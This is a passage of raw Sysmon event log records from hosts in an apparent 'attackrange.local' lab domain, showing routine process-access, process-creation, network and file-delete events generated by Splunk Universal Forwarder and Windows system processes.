AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.272{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.272{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72757DB1BEF7482DACF54696CEEDF2E9,SHA256=D5ACEA59E8D0A3E1526FFAD680D97628062DB90607BBDCBDB51CD7926E2FD487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:25.728{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A4A2F61ACA1CE688676140AFD6F241,SHA256=1FA868011343B22872EDA6BEF32F019CBEE52D9A9811C05292A1F74194E1C9D8,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000807765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.709{0C1E0330-F4F5-60EB-7C79-00000000D001}35203420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.326{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57280-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 